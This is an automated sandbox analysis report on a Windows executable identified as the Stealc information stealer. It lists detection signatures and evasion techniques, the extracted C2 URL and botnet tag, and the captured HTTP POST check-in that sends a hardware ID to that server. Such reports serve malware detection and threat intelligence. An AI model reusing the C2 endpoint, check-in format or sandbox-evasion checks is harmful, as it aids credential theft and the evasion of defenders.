Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541419
MD5:f8499202b78a41093fc86e4ee8be2d0b
SHA1:56066a06e2ae405ad5e7dc5be7f37283aa742fa0
SHA256:e81eb5bcb9497a84f1f496cf0af37c234f8e80aaf0bb179e153005592ef67321
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F8499202B78A41093FC86E4EE8BE2D0B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4788JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4788JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T20:20:04.670212+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.400000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0040C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00409B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00418EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00414570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F68A FindFirstFileA,0_2_0040F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00413EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 42 37 38 43 33 45 34 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="hwid"D57B78C3E4104081907672------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="build"doma------BFHDHJKKJDHJJJJKEGHI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 42 37 38 43 33 45 34 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="hwid"D57B78C3E4104081907672------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="build"doma------BFHDHJKKJDHJJJJKEGHI--
                Source: file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/?
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
                Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B30_2_0084C8B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F70270_2_006F7027
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EA0AA0_2_006EA0AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B38890_2_007B3889
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF9620_2_007CF962
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CC1ED0_2_007CC1ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D49D50_2_007D49D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DA1B90_2_007DA1B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C8B690_2_007C8B69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DB3990_2_007DB399
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D14BA0_2_007D14BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007344930_2_00734493
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00765D1E0_2_00765D1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D7E760_2_007D7E76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007356560_2_00735656
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004045C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nxusumaz ZLIB complexity 0.9947304242810066
                Source: file.exe, 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WXVFZ6PQ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1865216 > 1048576
                Source: file.exeStatic PE information: Raw size of nxusumaz is bigger than: 0x100000 < 0x1a1400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nxusumaz:EW;hgxnhwve:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nxusumaz:EW;hgxnhwve:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cac0d should be: 0x1cd0cb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nxusumaz
                Source: file.exeStatic PE information: section name: hgxnhwve
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C085 push edx; mov dword ptr [esp], ebp0_2_0084C096
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C085 push ebp; mov dword ptr [esp], edx0_2_0084C0AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C085 push ebx; mov dword ptr [esp], esi0_2_0084C13F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F089 push 0FF36103h; mov dword ptr [esp], ecx0_2_0088F0B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00805889 push ebp; mov dword ptr [esp], 3DFE3876h0_2_00805910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00805889 push 645F3D45h; mov dword ptr [esp], edi0_2_00805936
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00805889 push 47B289C1h; mov dword ptr [esp], edi0_2_0080595C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C2899 push edx; mov dword ptr [esp], eax0_2_008C28BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B3 push edi; mov dword ptr [esp], ebx0_2_0084C8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B3 push 52F94AAAh; mov dword ptr [esp], esi0_2_0084C946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B3 push ecx; mov dword ptr [esp], eax0_2_0084C976
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B3 push eax; mov dword ptr [esp], ecx0_2_0084C9B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C8B3 push 49990CA0h; mov dword ptr [esp], esp0_2_0084C9EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push edx; mov dword ptr [esp], eax0_2_006F7031
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push ebp; mov dword ptr [esp], eax0_2_006F7045
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push esi; mov dword ptr [esp], ebx0_2_006F70A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push ebx; mov dword ptr [esp], edi0_2_006F70A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push edi; mov dword ptr [esp], edx0_2_006F70EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push esi; mov dword ptr [esp], edx0_2_006F70FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push 0CF5AE6Ch; mov dword ptr [esp], ecx0_2_006F715A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push ebp; mov dword ptr [esp], 00000000h0_2_006F715E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push 1E3B52E4h; mov dword ptr [esp], eax0_2_006F71B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push 66E3ABCFh; mov dword ptr [esp], eax0_2_006F7210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7027 push 3B6634EBh; mov dword ptr [esp], esi0_2_006F7264
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085F8DD push 11BE9061h; mov dword ptr [esp], ecx0_2_0085F90B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008510E5 push 25C5E6ABh; mov dword ptr [esp], ecx0_2_008510A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008510E5 push 3BE59884h; mov dword ptr [esp], edx0_2_008510B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050F2 push edx; mov dword ptr [esp], ebp0_2_00805136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050F2 push 6FFB5A8Ch; mov dword ptr [esp], eax0_2_00805156
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050F2 push 168A9179h; mov dword ptr [esp], edi0_2_00805188
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050F2 push 59A1F4F3h; mov dword ptr [esp], ebp0_2_008051C8
                Source: file.exeStatic PE information: section name: nxusumaz entropy: 7.954159005583094

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13679
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1D68 second address: 7E1D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0DD3 second address: 7E0DDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0DDB second address: 7E0DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0EE8 second address: 7E0EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1176 second address: 7E117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E117C second address: 7E119A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007FECB125BFD5h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E148B second address: 7E1494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E15FE second address: 7E160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E44A4 second address: 7E44A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
